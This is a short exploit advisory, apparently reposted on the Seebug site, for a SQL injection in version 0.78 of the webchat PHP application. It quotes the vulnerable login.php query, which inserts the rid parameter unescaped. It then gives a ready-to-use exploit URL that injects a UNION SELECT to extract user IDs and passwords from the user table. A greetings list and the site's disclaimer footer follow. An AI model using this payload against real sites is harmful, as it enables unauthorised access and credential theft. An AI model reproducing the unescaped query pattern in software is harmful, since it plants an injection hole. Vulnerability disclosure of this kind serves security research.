######################################################################### # # [webchat 0.78] # # Class: SQL Injection # Published 28/06/2007 # Remote: Yes # Critical Level : Dangerous # Site: http://sourceforge.net/projects/webdev-webchat/ # Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0 # Author: R00T[ATI] # Contact: r00t.ati@gmail.com - http://inclusionhunter.altervista.org/index.php # ######################################################################### Vulnerable code: login.php ====================================================== <? $q = new DB_Chat; $q->query("select * from room where rid='$rid'"); if ($q->next_record()) { ?> ======================================================= Exploit : ============================================================================================================ http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/* ============================================================================================================ Thanks To: ====================================================== All Root@Shell members; White_Sheep; SparrowRulez; st0ke; ======================================================
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论